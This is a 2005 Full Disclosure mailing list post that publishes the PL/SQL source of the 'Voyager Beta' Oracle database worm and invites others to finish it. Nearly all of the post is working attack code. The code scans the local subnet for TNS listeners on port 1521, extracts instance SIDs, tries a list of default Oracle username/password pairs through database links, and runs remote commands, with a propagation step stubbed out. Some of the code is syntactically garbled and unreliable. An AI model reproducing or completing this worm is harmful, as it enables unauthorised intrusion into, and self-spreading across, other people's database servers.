Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Trick or treat Larry
From: <oracleworm () hushmail com>
Date: Mon, 31 Oct 2005 14:12:29 -0800

Voyager Beta worm - not complete - maybe someone else has time to 
look at it


set serveroutput on
set verify off

DECLARE

i1 INTEGER;
i2 INTEGER;

iHostToSearchFor INTEGER;

current_ipaddress VARCHAR2(100);
current_network VARCHAR2(100);
current_letter VARCHAR2(1);

c   UTL_TCP.CONNECTION;
ln integer;

vLen NUMBER;

PreviousSID varchar2(100);

vRequest varchar2(500);
vResp varchar2(32767);
vRespPiece varchar2(200);
vRespTemp varchar2(200);
ret_val pls_integer;

BEGIN

current_ipaddress := utl_inaddr.get_host_address;
ln := length(current_ipaddress);

loop
 current_letter := substr(current_ipaddress, ln, 1);
        ln := ln - 1;
        
        EXIT WHEN current_letter = '.';
        EXIT WHEN ln = 0;
end loop;

current_network := substr(current_ipaddress, 1, ln);

dbms_output.put_line( 'network to search: ' || current_network );
dbms_output.put_line( 'starting: ' || to_char(sysdate, 'MI:SS') );

iHostToSearchFor := 220;

vRequest := chr(0) || chr(89) || chr(0) || chr(0) || chr(1) || 
chr(0) || chr(0) || chr(0) || 
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || 
chr(8) || chr(0) || 
chr(127) || chr(255) || chr(127) || chr(8) || chr(0) || chr(0) || 
chr(0) || chr(1) || 
chr(0) || chr(31) || chr(0) || chr(58) || chr(0) || chr(0) || 
chr(0) || chr(0) || 
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) 
|| chr(0) || 
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(230) || 
chr(0) || chr(0) || 
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) 
|| chr(0) || 
chr(0) || chr(0) || '(CONNECT_DATA=(COMMAND=status))'; 

loop
 begin
   vResp := ''; 
   PreviousSID := '';

        c  := UTL_TCP.OPEN_CONNECTION(current_network || '.' || 
iHostToSearchFor, 1521);
   dbms_output.put_line( 'found live port @ ' || to_char(sysdate, 
'MI:SS') || ' - ' || current_network || '.' || iHostToSearchFor);
   ret_val := UTL_TCP.WRITE_RAW(c, utl_raw.cast_to_raw(vRequest)); 
   vLen := UTL_TCP.READ_RAW(c, vResp, 100 ); 

   vRespPiece := utl_raw.cast_to_varchar2(utl_raw.substr(vResp, 43, 
58)); 
   vResp := vRespPiece;
   
   declare 
       read_from_network varchar2(32000);
       length_read_from_network INTEGER;
   begin
   
     loop
       read_from_network := ''; 
       length_read_from_network := UTL_TCP.READ_RAW(c, 
read_from_network, 100 ); 
       read_from_network := 
utl_raw.cast_to_varchar2(utl_raw.substr(read_from_network, 1, 
length_read_from_network));
       vResp := vResp || read_from_network;
       
     end loop;
   
     EXCEPTION
       when OTHERS then
         read_from_network := '';                 
   end;

-- look for INSTANCE_NAME= and then for )

--   dbms_output.put_line( substr( vResp, 1, 254) );
--   dbms_output.put_line( substr( vResp, 255, 254) );
--   dbms_output.put_line( substr( vResp, 510, 254) );

         
          UTL_TCP.CLOSE_CONNECTION(c); 

 declare 
   i3 INTEGER;
   i4 INTEGER;
   sid varchar2(100);
                cur binary_integer;
                i binary_integer;
                procedure_to_spread varchar2(32000);
   create_link varchar2(500);    
 begin    

   i3 := 1;
   i4 := 1;

   loop
 
     i3 := instr(vResp, '(INSTANCE_NAME=', i3);
     exit when i3 = 0;

     i4 := instr(vResp, ')', i3);
     sid := substr( vResp, i3 + 15, i4 - (i3 + 15));
     dbms_output.put_line( 'Found SID of ' || sid );
     i3 := i3 + 1;

     begin
       if sid = PreviousSID or sid = 'PLSExtProc' or sid = 
'extproc' 
       then
         -- don't do anything
         dbms_output.put_line( 'Not trying the SID: ' || sid );
       else
         dbms_output.put_line( 'Attacking the SID: ' || sid );      
                               

        loop          

           declare 
           
            iLoop integer := 0;
            username1 varchar2(100);
            password1 varchar2(100);
            
           begin
           
           iLoop := iLoop + 1; 
           exit when iLoop = 8;
           
           if iLoop = 1 then
             username1 := 'system';
             password1 := 'manager';
             
           else if iLoop = 2 then
             username1 := 'sys';
             password1 := 'change_on_install';
           
           else if iLoop = 3 then
             username1 := 'dbsnmp';
             password1 := 'dbsnmp';
           
           else if iLoop = 4 then
             username1 := 'outln';
             password1 := 'outln';
           
           else if iLoop = 5 then
             username1 := 'scott';
             password1 := 'tiger';
           
           else if iLoop = 6 then
             username1 := 'mdsys';
             password1 := 'mdsys';
           
           else if iLoop = 7 then
             username1 := 'ordcommon';
             password1 := 'ordcommon';
           
           end if;
                       
           
                cur := dbms_sql.open_cursor;
                dbms_sql.parse(cur, 'drop database link xxx', 
dbms_sql.v7);
                i := dbms_sql.execute( cur );
                
                    create_link := 'CREATE DATABASE LINK xxx CONNECT TO ' || 
username1 || ' IDENTIFIED BY ' || password1 || ' USING 
''(DESCRIPTION=(ADDRESS_LIST=(ADDRESS = (PROTOCOL = TCP)(HOST = ' 
|| iHostToSearchFor || ')(PORT = 
1521)))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=' || SID || 
')))';
                
                dbms_sql.parse(cur, create_link, dbms_sql.v7);
                i := dbms_sql.execute( cur );
                dbms_sql.close_cursor(cur);

                      cur := dbms_sql.open_cursor () xxx;
--                      dbms_sql.parse () xxx(cur, procedure_to_spread, 
dbms_sql.v7);
--                      i := dbms_sql.execute () xxx( cur );
                dbms_sql.parse () xxx(cur, 'drop table x', dbms_sql.v7);
                i := dbms_sql.execute () xxx( cur );
                dbms_sql.parse () xxx(cur, 'CREATE TABLE X (Y DATE)' , 
dbms_sql.v7);
                i := dbms_sql.execute () xxx( cur );
                dbms_sql.close_cursor () xxx(cur);
                
                exception
                  when others then
              DBMS_OUTPUT.PUT_LINE('failed creating a database link 
that worked '); 
                
                end if;
                
         end loop;
         
       end if;
       
       PreviousSID := SID;

     end;
           
   end loop;

 end;
          
 EXCEPTION
   when utl_tcp.NETWORK_ERROR then
       DBMS_OUTPUT.PUT_LINE('nothing found @ ' || to_char(sysdate, 
'MI:SS') || ' - ' || current_network || '.' || iHostToSearchFor); 
        end;
         
        iHostToSearchFor := iHostToSearchFor - 1;
        EXIT WHEN iHostToSearchFor = 216;
end loop;

dbms_output.put_line( 'finished the loop @ ' || to_char(sysdate, 
'MI:SS') );

END;
/





Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Trick or treat Larry oracleworm (Oct 31)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]